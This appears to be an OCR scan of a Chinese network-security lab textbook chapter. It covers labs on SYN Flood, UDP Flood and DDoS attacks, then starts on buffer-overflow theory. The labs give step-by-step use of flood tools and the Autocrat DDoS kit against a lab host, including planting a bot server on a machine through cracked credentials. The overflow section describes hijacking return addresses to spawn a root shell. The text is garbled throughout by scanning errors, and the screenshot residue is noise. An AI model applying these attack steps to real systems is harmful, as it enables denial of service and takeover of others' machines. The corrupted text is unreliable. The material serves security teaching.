如 果 短 时 间 内 连续 受到 某 个 IP 的 重复 SYN 报 文 ， 就 认定 是 受到 了 攻击 ， 以 后 从 这 个 IP 
地 址 来 的 包 会 被 丢弃 。 

可 是 上 述 的 两 种 方法 只 能 对 付 比 较 原始 的 SYN Flood 攻击 ,缩短 SYN Timeout 时 间 
仅 在 对 方 攻击 频 度 不 高 的 情况 下 生效 ，SYN Cookie 更 依赖 于 对 方 使 用 真实 的 IP 地 址 ， 
如 果 攻 击 者 以 数 万 次 / 秒 的 速度 发 送 SYN 报 文 ， 同 时 利用 SOCK_RAW 随机 改写 IP RC 
中 的 源 地 址 ， 以 上 的 方法 将 毫 无 用 武之 地 。 
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【实验 环境 】 

Windows XP 系统 、Apache Tomcat、SDos 和 Wireshark。 

【实验 步 又 】 

CD 合作 者 1: 登录 到 Windows， 打 开 命 令 行 提示 窗口 ， 运 行 netstat 命令 ， 观 察 响 
应 。 在 "m netstat 命令 显示 了 所 有 当前 连接 ， 可 以 注意 到 netstat 所 返回 的 记录 是 比较 
少 的， 因为 这 时 还 没有 开始 SYN Flood 攻击 ， 如 图 16-24 所 示 。 


c:\Documents and Settings \Administrator> 
图 16-24 ”攻击 前 连接 


(2) 合作 者 2: 登录 到 Windows， 安 装 SDos 攻击 工具 。 

(3) 合作 者 1 开启 本 地 的 Tomcat 服务 器 ， 并 将 开始 的 端口 号 告知 合作 者 2， 这 里 
约定 为 8080。 

(4) 合作 者 2: 运行 SDos 攻击 器 ， 并 输入 合作 者 1 的 卫 地址 (192.168.19.130) 和 
Tomcat 的 端口 号 (80800, 选择 协议 类 型 为 TCP, 然后 单 击 Attack, 开始 攻击 , 如 图 16-25 
所 示 。 


£ Supper DDos (V1. 00) 
Powerful DDOS tools, only for testing usage 
Target IP: [EME ~ (Input Target IP or DNS name) 


Port: [8080 Cnput Target Port) 


Protocol: (@ TCP c y» (Choose the protocol) 


Information: Stop attacking Press "Attack" to start attack again! 


| caca 


图 16-25 攻击 设置 界面 


(5) 合作 者 1: 再 次 运行 netstat 命令 行程 序 ， 注 意 观察 SYN Flood 攻击 的 结果 ; 可 
以 看 到 系统 收 到 大 量 的 从 伪造 的 TP. 地 址 发 出 的 SYN 包 ， 导 致 与 系统 的 半 开 连接 数量 急 
剧 上 升 ， 如 图 16-26 所 示 。 

(6) 合作 者 2: 单 击 Stop， 停 止 攻击 。 

CD 合作 者 1: 打开 Wireshark， 准 备 捕捉 从 任何 目标 发 送 到 本 机 的 SYN 包 ， 如 
图 16-27 所 示 。 
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a BEE 


C:\Documents and Settin 


Active Connections 


Proto Local Addr 
TCP 172cb719df a647f 21852 


Documents and Settings^ inistrator>ne at 
Active Conn ons 


Proto Local Addre gn Address St 
172ch719df a647f -8686 - SVN R 
172ch719df a647f :8888 Br .127.48:19785 SYN_RECEIVED 
172cb719df a64 BL .12.16 4 SYN_RECEIVED 
172cb719df a647: -247.199.215:8818 SYN. 
172cb719df a647?: 8 9.39 .187.97 
172ch719df a647 8 .117.118.9' 
172ch719df a647. 

19dfa647 
cb719dfa647f :8880 
ch719dfa647f :8880 


图 16-26 攻击 后 连接 


yos 回回 加 
Tile Edit 

a ài e a axza SS) & & & avax B 

Filter: v Expression. Clear Apply 


Open 


Start capture on interface Open Recent 


BE Adapter for generic dialup and VPN capture 
bp) Intel (R) 8258TUI-3 Gigabit Network Connection g = 


图 16-27 Wireshark 的 主 界面 


(D 合作 者 2: 重新 开始 攻击 。 

(9) 合作 者 1: 单 击 网 卡 作 为 捕 提 接口， 开始 捕 捉 ， 可 以 看 到 连接 的 计数 器 在 大 幅 
增长 ， 如 图 16-28 所 示 。 

(10) 感 兴趣 的 读者 可 以 在 Wireshark 中 分 析 包 的 字段 含义 。 

【实验 报告 】 

(1) 详细 描述 实验 过 程 ， 分 析 SYN FLood 攻击 的 危害 。 

(2) 给 出 防范 SYN Flood 攻击 的 方法 。 


【思考 题 】 
参考 SYN Flood 攻击 的 代码 , 编写 Land 攻击 代码 。Land 攻击 是 一 种 DOS 攻击 ， 它 
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"e Edit View Go mee "Teen Aes Telephony lp 
Kaaa BEXZO.e9oT£BEBGoemaemix Hu 


Filter v Expression... Clear Apply 


图 16-28 Wireshark 捕捉 数据 包 


利用 了 TCP 连接 建立 的 三 次 握手 过 程 ， 通 过 向 一 个 目标 计算 机 发 送 一 个 TCP SYN 报 文 
(连接 建立 请 求 报 文 ) 而 完成 对 目标 计算 机 的 攻击 。 与 正常 的 TCP SYN 报 文 不 同 的 是 ， 
LAND 攻击 报 文 的 源 IP 地 址 和 目的 IP 地 址 是 相同 的 ， 都 是 目标 计算 机 的 IP 地址 。 这 样 
目标 计算 机 接收 到 这 个 SYN 报 文 后 ， 就 会 向 该 报 文 的 源 地 址 发 送 一 个 ACK 报 文 ， 并 建 
立 一 个 TCP 连接 控制 结构 (TCB)， 而 该 报 文 的 源 地 址 就 是 自己 ， 因 此 ， 这 个 ACK 报 文 
就 发 给 了 自己 。 这 样 如 果 攻 击 者 发 送 了 足够 多 的 SYN 报 文 ， 则 目标 计算 机 的 TCB 可 能 
会 耗 尽 ， 最 终 不 能 正常 服务 。 


16.3.2 UDP Flood 攻击 


【实验 目的 】 
分 析 、 理 解 UDP Flood 攻击 的 原理 与 过 程 ， 能 够 判断 UDP Flood 攻击 引起 的 效果 。 
【原理 简介 】 


UDP Flood 攻击 也 是 DDoS 攻击 的 一 种 常见 方式 。UDP 是 一 种 无 连接 的 服务 ， 它 不 
需要 用 某 个 程序 建立 连接 来 传输 数据 。 UDP Flood 攻击 是 通过 开放 的 UDP 端口 针对 相关 
的 服务 进行 攻击 。UDP Flood 攻击 器 会 向 被 攻击 主机 发 送 大 量 伪 造 源 地 址 的 小 UDP 包 ， 
冲击 DNS 服务 器 或 者 Radius 认证 服务 器 、 流 媒体 视频 服务 器 ， 甚 至 导致 整 个 网 段 竣 痪 。 

UDP Flood 是 日 渐 猩 狐 的 流量 型 Dos 攻击 ， 原 理 也 很 简单 。 常 见 的 情况 是 利用 大 量 
UDP 小 包 冲 击 DNS 服务 器 或 Radius 认证 服务 器 、 流 媒体 视频 服务 器 。100kbps 的 UDP 
Flood 经 常 将 线路 上 的 骨干 设备 例如 防火 墙 打 瘫 ， 造 成 整个 网 段 的 瘫痪 。 由 于 UDP 是 一 
种 无 连接 的 服务 , 在 UDP Flood 攻击 中 , 攻击 者 可 发 送 大 量 伪造 源 卫 地 址 的 小 UDP 包 。 
但 是 ， 由 于 UDP 是 无 连接 性 的 ， 所 以 只 要 开 了 一 个 UDP 的 端口 提供 相关 服务 ， 那 么 就 
可 针对 相关 的 服务 进行 攻击 。 正 常 应 用 情况 下 ，UDP 包 双 向 流量 会 基本 相等 ， 而 且 大 小 
和 内 容 都 是 随机 的 ， 变 化 很 大 。 出 现 UDP Flood 的 情况 下 ， 针 对 同一 目标 全 的 UDP 包 


243 


网 络 安全 实验 教程 (第 2 版 ) 


在 一 侧 大 量 出 现 ， 并 且 内 容 和 大 小 都 比较 固定 。 

UDP Flood 防护 : UDP 与 TCP 不 同 ， 是 无 连接 状态 的 协议 ， 并 且 UDP 应 用 协议 五 
花 八 门 , 差异 极 大 ， 因此 针对 UDP Flood 的 防护 非常 困难 。 其 防护 要 根据 具体 情况 对 待 : 
判断 包 大 小 , 如 果 是 大 包 攻 击 则 使 用 防止 UDP 碎片 方法 , 根据 攻击 包 大 小 设 定 包 碎 片 重 
组 大 小 ， 通 常 不 小 于 1500。 在 极端 情况 下 ， 可 以 考虑 丢弃 所 有 UDP 碎片 。 攻 击 端口 为 
业务 端口 :根据 该 业务 UDP 最 大 包 长 设置 UDP 最 大 包 大 小 以 过 滤 异 常 流量 。 攻 击 端 
为 非 业务 端口 : 一 个 是 丢弃 所 有 UDP 包 ， 可 能 会 误伤 正常 业务 ， 另 一 个 是 建立 UDP XE 
接 规 则 ， 要 求 所 有 去 往 该 端口 的 UDP 包 ， 必 须 首 先 与 TCP 端口 建立 TCP 连接 。 不 过 这 
种 方法 需要 很 专业 的 防火 墙 或 其 他 防护 设备 支持 。 


【实验 环境 】 
Windows XP 系统 、Apache Tomcat. UDP Flood 和 Wireshark. 


【实验 步骤 】 

本 实验 成 员 由 攻击 者 B 和 受 攻击 者 A 组 成 ， 过 程 中 A 和 B 都 关闭 防火 墙 。 以 下 用 
A All B 的 交互 演示 实验 步骤 。 

(1) A: 打开 Tomcat 服务 器 ， 并 使 用 netstat -an 命令 查看 开放 的 端口 ， 如 图 16-29 
所 示 。 


m -四 


ESTABLISHED 
ES 


5 STABLI 
8088 92.16 FIN_WAIT. 
8088 9 68.19. FIN_WAIT_2 


00 


Settings Adminis 


图 16-29 查看 开放 的 端口 


(2) B: 打开 UDP Flood 攻击 器 ， 并 填 入 A 的 IP 地址 和 其 开放 的 端 Ff Go 
按钮 ， 如 图 16-30 所 示 。 这 个 攻击 器 可 以 设 定 攻 击 的 时 间 (Max duration (secs)) 和 发 送 
的 最 大 UDP 包 数 (Max packets) 以 及 发 送 UDP 包 的 速度 (Speed)， 还 可 以 选择 发 送 包 
的 数据 大 小 和 类 型 (Data )。 

(3) A 打开 Wireshark 抓 包 ， 并 设置 Filter 为 UDP， 可 以 看 到 有 大 量 来 自 B 
(192.168.19.144) 的 UDP 数据 包 ， 并 且 数 据 包 的 大 小 都 几乎 一 样 ， 如 图 16-31 所 示 。 


Y 
in 
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UDP Flooder 2.00 ... 


Destination 


IP/hostname | 


Transmission control 


Max duration (secs) Max packets 


min 
Speed (pkts/sec) 


100 
Modem —»-— Cable —-— T1 >- LAI 


Data 


= to [ican bytes 
El 


Status 
Packets sent 4204 
Seconds elapsed 42.46 


dile Edit View Go Capture Analyze Statistics Telephony Tools Help 

& a wa ee OFZ Em aaemaemx 

Filter: udsl + Expression.. Clear Apply 

Wo Tine Source Destination Frotocel_ Info 
7038 90.122841 192,168.19.144 192.168.19.130 UDP "Source port: exapt-Imgr Destination port: http-alt 
7041 90.137739 192.168.19.177 192,168.19, 255 SSOP NOTIFY * HTTP/1,1 
7042 90.138460 192.168.19.144 192.168.19.130 UDP Source port: exapt-lmgr Destination port: http-alt 
7044 90.138473 192.168.19.144 192.168.19.130  UDP Source port: exapt-Imgr Destination port: http-alt 
7046 90.153966 192.168.19.144 192.168.19.130  UDP Source port: exapt-Imgr Destination port: http-alt 


7049 90.169726 192.168.19.144 192.168.19.130 UDP ^ Source port: exapt-Imgr Destination port: http-alt 


7051 90.169742 192.168.19.144 192.168.19.130 UDP Source port: exapt-Imgr Destination port: http-alt 


7053 90.185335 192.168.19.144 192.168.19.130 UDP Source port: exapt-Imgr Destination port: http-alt 


7056 90.200961 192.168.19.144 192.168.19.130 UDP ^ Source port: exapt-lmgr Destination port: http-alt 


7058 90.200978 192.168.19.144 192.168.19.130 UDP ^ Source port: exapt-Imgr Destination port: http-alt 


7060 90.216592 192.168.19.144 192.168.19.130 UDP ^ Source port: exapt-Imgr Destination port: http-alt 


7063 90.232209 192.168.19.144 192.168.19.130 UDP Source port: exapt-Imgr Destination port: http-alt 


图 16-31 在 受 攻击 端 捕获 的 数据 包 


(4) B 打开 Wireshark 抓 包 ， 并 设置 Filter 为 ICMP， 可 以 看 到 有 大 量 来 自 A 
(192.168.19.130) 的 ICMP 数据 包 ， 并 且 数 据 包 都 是 Destination unreachable (Port 
unreachable )， 如 图 16-32 所 示 。 这 是 因为 当 受 害 系统 接收 到 一 个 UDP 数据 包 的 时 候 ， 
它 会 确定 目的 端口 正在 等 待 中 的 应 用 程序 。 当 它 发 现 该 端口 中 并 不 存在 正在 等 待 的 应 用 
程序 ， 它 就 会 产生 一 个 目的 地 址 无 法 连接 的 ICMP 数据 包 发 送 给 该 伪造 的 源 地 址 。 这 里 
可 以 明显 地 看 出 A 向 B 回 送 了 很 多 ICMP 包 ， 但 是 端口 却 是 unreachable. 

(5) 感 兴趣 的 读者 可 以 对 截获 的 数据 包 的 具体 内 容 进行 查看 ， 并 调整 UDP Flood 攻 
击 器 的 参数 。 
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m Capturing from Intel(R) 82567LM-3 Gigabit Network Connection - Wireshark CAK 

Eile Edit View Go Capture Analyze Statistics Telephony Tools Help 

S aoo a Exea&LueeetT£ziBBaaemnacexi lu 

Filter: icmp * Expression... Clear Apply 

No. Tine Protoco: Info 
5410 2. LI 


Destination ^ 


Source 
92.168, 


H 


图 16-32 在 攻击 者 端 捕获 的 数据 包 


【实验 报告 】 
详细 描述 实验 过 程 ， 分 析 UDP Flood 引起 的 流量 变化 。 
思考 题 】 


分 析 UDP Flood 攻击 和 SYN Flood 攻击 的 原理 有 何不 同 。 
16.3.3 DDoS 攻击 


【实验 目的 】 
了 解 分 布 式 拒绝 服务 攻击 的 原理 及 危害 ， 掌 握 独裁 者 DDoS 攻击 工具 的 使 用 方法 。 


【原理 简介 】 

分 布 式 拒绝 服务 攻击 (DDoS ) 的 攻击 手段 是 在 传统 的 拒绝 服务 攻击 (Dos) 基础 之 
上 产生 的 一 类 攻击 方式 。 单 一 的 DoS 攻击 一 般 是 采用 一 对 一 方式 的 ， 当 攻击 目标 CPU 
速度 低 、 内 存 小 或 者 网 络 带宽 小 等 各 项 性 能 指标 不 高 时 它 的 效果 是 明显 的 。 随 着 计算 机 
与 网 络 技术 的 发 展 ， 计 算 机 的 处 理 能 力 迅速 增长 ， 内 存 大 大 增加 ， 同 时 也 出 现 了 千 兆 级 
别 的 网 络 ， 这 使 得 DoS 攻击 的 困难 程度 加 大 了 。 这 时 候 拒绝 服务 攻击 发 展 成 为 多 台 主 机 
同时 对 目标 进行 协同 攻击 ， 这 种 攻击 方式 称 为 分 布 式 拒绝 服务 攻击 。 入 侵 者 先 控 制 多 台 
无 关 主机 ， 在 上 面 安装 守护 进程 和 服务 端 程序 。 当 需要 攻击 时 ， 入 侵 者 从 客户 端 连接 到 
安装 了 服务 器 端 软件 的 主机 上 ， 发 出 攻击 指令 ， 服 务 端 软件 指挥 守护 进程 同时 向 目 标 主 
1 发 动 拒绝 服务 攻击 。 目 前 流行 的 分 布 式 拒 绝 服务 攻击 软件 一 般 没 有 专用 的 客户 端 ， 使 
日 Telnet 进行 连接 和 传送 控制 指令 。 
DDoS 攻击 是 在 DoS 攻击 的 基础 上 产生 的 , 它 不 再 像 Dos 那样 采用 一 对 一 的 攻击 方 
\， 而 是 利用 控制 的 大 量 肉 鸡 共同 发 起 攻击 ， 肉 鸡 数量 越 多 ， 攻 击 力 越 大 。 


a 


"um 


au 
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一 个 严格 和 完善 的 DDoS 攻击 一 般 由 4 个 部 分 组 成 : 攻击 端 、 控 制 端 、 代 理 端 和 受 
害 者 ， 如 图 16-33 所 示 。 


Te T 
^u. 


代理 端 
图 16-33 DDoS 的 组 成 

独裁 者 DDoS 是 一 款 功能 齐全 的 DDoS 攻击 软件 ， 除 了 能 够 联合 肉鸡 发 动 攻 击 ， 还 
具有 控制 攻击 时 间 、 启 动 信使 服务 等 众多 功能 ， 并 且 有 4 种 攻击 方式 可 供 选择 。 

【实验 环境 】 

Windows XP 系统 、Apache Tomcat、 独 裁 者 DDoS 和 Wireshark. 

【实验 步骤 】 

da) 本 实验 需要 三 台 计 算 机 通过 网 络 互相 访问 ， 假 设 分 别 记 作 A 作为 服务 器 和 被 
攻击 主机 )、B〔 作 为 被 控制 主机 )、C〔 作 为 攻击 主机 )。 在 A、B、C 上 分 别 关 闭 防 火 墙 
和 杀毒 软件 , 并且 在 A 上 开启 Apache Tomcat 服务器,C 在 本 地 机 中 解压 Autocrat 1.26.60, 
可 以 看 到 如 图 16-34 所 示 的 文件 。 

名 称 ^ 大 小 ”类 型 修改 日 期 


Bgciient | 46 KB 应 用 程序 2002-8-26 14:26 

(S) MSVINSCK. OCX 106 KB ActiveX 控件 1998-6-24 0:00 

©) ReadneNow 3 KB 文本 文档 2002-8-28 11:07 
RICHIX32. OCX 199 KB ActiveX 控件 1998-6-24 0:00 

a 

Server 101 KB 应 用 程序 2002-8-26 11:28 


图 16-34 Autocrat 1.26.60 包含 的 文件 


(2) 攻击 主机 C 要 将 B (如 “192.168.19.135”) 控制 , 并 将 独裁 者 DDos 的 Server.exe 
(服务 端 ) 文件 植 入 B 中 ， 并 运行 Server.exe。 这 里 假设 ，C 通过 各 种 手段 (如 社会 工程 、 
口令 破解 等 ) 已 经 获得 了 B 的 用 户 名 (如 “Faith”) 和 口令 (如 “123456”)， 并 通过 木 
马 或 net use 命令 将 Server.exe 文件 复制 到 B 中 并 运行 ，B 在 运行 后 会 重启 系统 。 
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G) 攻击 主机 C 可 以 通过 在 浏览 器 地 址 栏 中 输 如 B 的 卫 地 址 和 8538 端口 ， 查 看 是 
和 否 通过 独裁 者 控制 B 成 为 肉鸡 ， 若 成 功 则 如 图 16-35 所 示 。 


攻击 远程 服务 管理 器 Powered by 小 全 :=- 


© 2002-2 MAK 版 权 所 有 


图 16-35 ”验证 控制 肉鸡 成 功 


(4) 攻击 主机 C 就 运行 独裁 者 中 的 Client.exe 程序 ， 主 界面 如 图 16-36 所 示 。 


独裁 者 . : :Powered by 小 金 ::. (C)2002 HBUO 梦 勾 小 组 


a Autocrat DDoS Clients. E 


Hei :B 3.U 


MBUAMÁH FMN. AME. theOcrat. KASH 协力 制作 E-MAIL: cjcOO7@cnuninet. com 


主机 列表 攻击 方式 
共有 0 台 主机 = g = 
Á E 26] e 

EJ svi earl) EEZP 


omneo 源 F[ Cdl 


口 随 机 产生 源 P AHP | ] Bn [ | 
pasene - 
口 自用 定时 设置 4[ E Cesena ] 
Less | [arse | | moma | [stem | | men 
ree | RE -] 
Ci] |[ ,|2 FIAS: ER 可 


图 16-36 ”独裁 者 Client 的 主 界面 


(5) 在 Client 中 加 入 被 控制 的 肉鸡 B 〈192.168.19.135， 在 真正 的 攻击 中 会 控制 多 台 
肉鸡 ， 本 实验 为 了 简单 起 见 仅 控制 一 台 ， 以 展示 控制 的 方法 )， 并 填 入 目标 卫 ， 即 A 的 
IP 地 址 〈192.138.19.130) 和 端口 号 〈8080)。 然 后 可 以 选择 攻击 方式 ， 这 里 攻击 方式 共 
有 4 种 : SYN, LAND, FakePing 和 狂怒 之 Ping。 可 以 选择 SYN 攻击 。 然 后 单 击 【开始 
攻击 】 按 钮 ， 如 图 16-37 所 示 。 

最 后 可 以 在 A 主机 上 运行 Wireshark， 查 看 接收 到 的 数据 包 ， 如 图 16-38 所 示 。 


【实验 报告 】 
详细 描述 实验 过 程 ， 分 析 独 裁 者 DDoS 的 危害 。 
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::Powered by 小 金 ::. (C)2002 HBUMB4IPA 


red by 


sj Autocrat DDoS Client 75,2584 p u 


Hei Bai Union 
HBU/ARH F, AK. theOcrat. RASA BABE E-BAIL: cjc00Tecnuninet- com 


主机 列表 
共有 1 台 主 机 DEmIBE = — 
192.168.19.135 a ® 

扫描 主机 | ez Ping 


随机 产生 源 端 口 ” 源 IP [171.158.34.200 WAO [37883 
回 随机 产生 源 IP 目标 IP [19216819130 目标 端口 [8080 
命令 控制 台 
口 启用 定时 设置 | 
检查 状态 | | 检查 文件 | | 信使 服务 | | 开始 攻击 | | 停止 攻 击 
信使 服务 : | 提示 信息 “了 
切换 | 超时 《| | »| 2 | | 手工 命令 


了 时间: 禁用 设置 时 间 


信息 
活动 主机 :1 无 效 主机 :0 LULg 


192.168.19.135 连接 成 功 , 正在 启动 攻击 程序 : syn 171.158. 94. 200 37883 192.168.19.130 8080 
192.168.19.135 - SYN 启动 成 功 


图 16-37 SYN 攻击 


| 23 I 3 CAP eb Bag) 
Eile Edit View Go Capture Analyze Statistics Telephony Tools Help 

B a B Qi a - \ LE EA 

Filter: tepl + Expression Clear Apply 


No. Tine Source Protocol Info 
way QUIULIUUU 196 Wr Weep qanm) seq-u w ES 


837957 123 TCP — http > hiserver [SYN, ACK] Seq=0 Ackel win«5840 LeneO MS: 


a 
è 
5 
X 
BE 
P 
s 
T 
E 
5 
E 
ps 
s 
: 
$ 
8 


420 28.963444 123.125. 50. 97 192.168. 19.130 Tp http > hlserver [ACK] Seq=1 Ack=296 win=6912 Len=0 


422 28.983634 123.125, 50, 97 192.168, 19,130 TCP http > hlserver [ACK] Seq=1 Ack=560 Win=8064 Len=0 


428 29.025868 123.125. 50.97 192.168. 19.130 TCP http > hlserver [ACK] Seq=352 Ack=561 Win=8064 Len=0 


1103 74.837943 123.125. 50.97 192.168. 19.130 TCP http > nsws [SYN, ACK] Seq=0 Ack=1 win-5840 Len=0 MSS-1460 SAC 


1110 74.963009 123.125.50.97 192.168.19.130 TCP http > nsws [ACK] Seq=1 Ack-296 win-6912 Len=0 


1113 74.983008 123.125.50.97 192.168.19.130 Tp http > nsws [ACK] Seq=l Ack=561 Win=7984 Len=0 
1114 74.990878 123.125.50.97 192.168.19.130 HTTP — HTTP/1.1 200 OK 


1117 75.011173 123.125.50.97 192.168.19.130 TCP http > nsws [FIN, ACK] Seq=309 Ack=562 Win=7984 Len=0 


图 16-38 ”查看 数据 包 


【思考 题 】 
观察 独裁 者 DDoS 的 行为 ， 分 析 如 何 监测 独裁 者 DDoS。 
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164 ”缓冲 区 溢出 攻击 与 防范 


【实验 目的 】 
掌握 缓冲 区 溢出 的 基本 原理 与 防范 方法 。 
【原理 简介 】 


缓冲 区 溢出 是 一 种 非常 危险 的 漏洞 ， 在 各 种 操作 系统 和 应 用 软件 中 广泛 存在 。 利 用 
缓冲 区 溢出 攻击 ， 可 以 导致 程序 运行 失败 、 系 统 宕 机 、 重 新 启动 等 后 果 。 更 为 严重 的 是 ， 
可 以 利用 它 执 行 非 授 权 指 令 ， 甚 至 可 以 取得 系统 特权 ， 进 而 进行 各 种 非法 操作 。 

缓冲 区 是 用 户 为 程序 运行 时 在 计算 机 中 申请 的 一 段 连续 的 内 存 ， 它 保存 了 给 定 类 型 
的 数据 。 缓 冲 区 溢出 指 的 是 一 种 常见 且 和 危害 很 大 的 系统 攻击 手段 ， 通 过 向 程序 的 缓冲 区 
写 入 超出 其 长 度 的 内 容 ， 造 成 缓冲 区 的 溢出 ， 从 而 破坏 程序 的 堆栈 ， 使 程序 转 而 执行 其 
他 的 指令 ， 以 达到 攻击 的 目的 。 

从 缓冲 区 溢出 概念 可 以 看 出 ， 缓 冲 区 溢出 就 是 将 一 个 超过 缓冲 区 长 度 的 字符 串 置 入 
缓冲 区 的 结果 ， 这 是 由 于 程序 设计 语言 的 一 些 漏洞 ， 如 C/C++ 语言 中 ， 不 对 缓冲 区 、 数 
组 及 指针 进行 边界 检查 (如 strepy()、strcat()、sprintf)、gets() 等 语句 )。 在 程序 员 也 忽略 
对 边界 进行 检查 而 向 一 个 有 限 空间 的 缓冲 区 中 置 入 过 长 的 字符 串 时 可 能 会 带 来 两 种 结 
果 : 一 种 是 过 长 的 字符 串 履 盖 了 相 邻 的 存储 单元 ， 引 起 程序 运行 失败 ， 严 重 的 可 导致 系 
统 崩溃 ， 另 一 种 是 利用 这 种 漏洞 可 以 执行 任意 指令 ， 甚 至 可 以 取得 系统 特权 ， 由 此 而 引 
发 多 种 攻击 方法 。 

缓冲 区 溢出 对 系统 的 安全 性 带 来 很 大 的 威胁 ， 比 如 向 程序 的 有 限 空 间 的 缓冲 区 中 置 
入 过 长 的 字符 串 ， 造 成 缓冲 区 溢出 ， 从 而 破坏 程序 的 堆栈 ,使 程序 转 去 执行 其 他 的 指令 ， 
如 果 这 些 指令 是 放 在 有 root 权限 的 内 存 里 ， 那 么 一 旦 这 些 指令 得 到 了 运行 ， 入 侵 者 就 以 
root 的 权限 控制 了 系统 , 这 也 是 人 们 所 说 的 U2R(User to Root Attacks) 攻 击 。 例 如 在 UNIX 
系统 中 ， 使 用 一 些 精 心 编写 的 程序 ， 利 用 SUID 程序 (如 FDFORMAT) 中 存在 的 缓冲 区 
溢出 错误 就 可 以 取得 系统 超级 用 户 权限 ， 在 UNIX 中 取得 超级 用 户 权限 就 意味 着 黑客 可 
以 随意 控制 系统 。 为 了 避免 这 种 利用 程序 设计 语言 漏洞 而 对 系统 的 恶意 攻击 ， 必 须要 仔 
细 分 析 缓 冲 区 溢出 攻击 的 产生 及 类 型 ， 从 而 做 出 相应 的 防范 策略 。 

缓冲 区 溢出 漏洞 和 攻击 有 很 多 种 形式 。 缓 冲 区 溢出 攻击 的 目的 在 于 扰乱 具有 某 些 特 
权 运 行 的 程序 的 功能 ， 这 样 可 以 使 得 攻击 者 取得 程序 的 控制 权 ， 如 果 该 程序 具有 足够 的 
权限 ， 那 么 整个 主机 就 被 控制 了 。 一 般 而 言 ， 攻 击 者 攻击 root 程序 ， 然 后 执行 类 似 
“exec(sh)” 的 执行 代码 来 获得 root 权限 的 Shell。 为 了 达到 这 个 目的 ， 攻 击 者 必须 达到 如 
下 的 两 个 条 件 : 

(1) 在 程序 的 地 址 空间 里 安排 适当 的 代码 。 

(2) 通过 适当 地 初始 化 寄存 器 和 内 存 ， 让 程序 跳 转 到 入 侵 者 安排 的 地 址 空间 执行 。 
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在 被 攻击 程序 地 址 空间 里 ， 安 排 攻 击 代码 的 方法 有 两 种 : 

CD 植 入 法 

攻击 者 向 被 攻击 的 程序 输入 一 个 字符 串 ， 程 序 会 把 这 个 字符 串 放 到 缓冲 区 里 。 这 个 
字符 串 包 含 的 资料 是 可 以 在 这 个 被 攻击 的 硬件 平台 上 运行 的 指令 序列 。 在 这 里 ， 攻 击 者 
用 被 攻击 程序 的 缓冲 区 来 存放 攻击 代码 。 缓 冲 区 可 以 设 在 任何 地 方 : 堆栈 (stack， 自 动 
AES. HE 〈heap， 动 态 分 配 的 内 存 区 ) 和 静态 资料 区 。 

(2) 利用 已 经 存在 的 代码 

有 时 ， 攻 击 者 想 要 的 代码 已 经 在 被 攻击 的 程序 中 了 ， 攻 击 者 所 要 做 的 只 是 对 代码 传 
递 一 些 参 数 。 比 如 , 攻击 代码 要 求 执 行 “exec ("/bin/sh")”, 而 在 libe 库 中 的 代码 执行 “exec 
(arg)”， 其 中 arg 是 一 个 指向 一 个 字符 串 的 指针 参数 ， 那 么 攻击 者 只 要 把 传 入 的 参数 指针 
改 向 指向 “/bin/sh ”。 

控制 程序 转移 到 攻击 代码 的 方法 ， 主 要 有 以 下 三 种 : 

(1) 活动 记录 (Activation Records) 

每 当 一 个 函数 调用 发 生 时 ， 调 用 者 会 在 堆栈 中 留 下 一 个 活动 记录 ， 它 包含 函数 结束 
时 返回 的 地 址 。 攻 击 者 通过 溢出 堆栈 中 的 自动 变量 ， 使 返回 地 址 指向 攻击 代码 。 通 过 改 
变 程序 的 返回 地 址 ， 当 函数 调用 结束 时 ， 程 序 就 跳 转 到 攻击 者 设 定 的 地 址 ， 而 不 是 原先 
的 地 址 。 这 类 的 缓冲 区 溢出 被 称 为 堆栈 溢出 攻击 Stack Smashing Attack)， 是 目前 最 常 
用 的 缓冲 区 溢出 攻击 方式 。 

(2) 函数 指针 (Function Pointers) 

函数 指针 可 以 用 来 定位 任何 地 址 空间 。 例 如 ,“void (* foo)()” 声 明了 一 个 返回 值 为 
void 的 函数 指针 变量 foo。 所 以 攻击 者 只 需 在 任何 空间 内 的 函数 指针 附近 找到 一 个 能 够 
溢出 的 缓冲 区 ， 然 后 溢出 这 个 缓冲 区 来 改变 函数 指针 。 在 某 一 时 刻 ， 当 程序 通过 函数 指 
针 调 用 函数 时 ， 程 序 的 流程 就 按 攻击 者 的 意图 实现 了 。 它 的 一 个 攻击 范例 就 是 在 Linux 
系统 下 的 superprobe 程序 。 

(3) 长 跳 转 缓冲 区 (Longjmp Buffers) 

在 C 语言 中 包含 一 个 简单 的 检验 /恢复 系统 ， 称 为 setjmp/longjmp。 意 思 是 在 检验 
点 设 定 Setjmp(Buffer), H] Longjmp(Buffer) 来 恢复 检验 点 。 然 而 ， 如 果 攻 击 者 能 够 进入 
缓冲 区 的 空间 , 那么 Longjmp(Buffer) 实 际 上 是 跳 转 到 攻击 者 的 代码 。 像 函数 指针 一 样 ， 
Longjmp 缓冲 区 能 够 指向 任何 地 方 ， 所 以 攻击 者 所 要 做 的 就 是 找到 一 个 可 供 溢出 的 组 
冲 区 。 一 个 典型 的 例子 就 是 Perl 5.003 的 缓冲 区 溢出 漏洞 ， 攻 击 者 首先 进入 用 来 恢复 组 
冲 区 溢出 的 Longjmp 缓冲 区 ， 然 后 诱导 进入 恢复 模式 ， 这 样 就 使 Perl 的 解释 器 跳 转 到 
攻击 代码 上 了 。 

最 简单 和 常见 的 缓冲 区 溢出 攻击 类 型 就 是 在 一 个 字符 串 里 综合 了 代码 植 入 和 活动 
记录 技术 。 攻 击 者 定位 一 个 可 供 溢 出 的 自动 变量 ,然后 向 程序 传递 一 个 很 大 的 字符 串 ， 
在 引发 缓冲 区 溢出 、 改 变 活动 记录 的 同时 植 入 了 代码 。 这 个 是 由 Levy 指出 的 攻击 的 模 
板 。 因 为 C 在 习惯 上 只 为 用 户 和 参数 开辟 很 小 的 缓冲 区 ， 因 此 这 种 漏洞 攻击 的 实例 十 
分 常见 。 
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一 般 而 言 ， 缓 冲 区 溢出 攻击 的 防范 手段 有 如 下 几 种 。 
(1) 在 程序 设计 的 时 候 严 格 定义 缓冲 区 边界 检查 ， 使 用 strmcpy0O) 等 安全 的 函数 代 蔡 


strcpy0 等 不 安全 的 函数 。 
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(2) 尽快 为 已 知 并 公布 漏洞 的 系统 安装 补丁 程序 。 
G) 作为 应 急 手 段 ， 可 以 对 具有 缓冲 区 溢出 漏洞 的 程序 动态 设置 用 户 权限 。 


【实验 环境 】 
一 台 装 有 Red Hat 6.2 操作 系统 的 PC. 


【实验 步骤 】 
a) 用 普通 用 户 登 录 Linux 系统 (实验 用 ， 这 里 普通 用 户 名 为 is)。 
(2) 将 以 下 代码 复制 到 Linux 系统 中 ， 并 命名 为 exe.c 和 toto.c。 


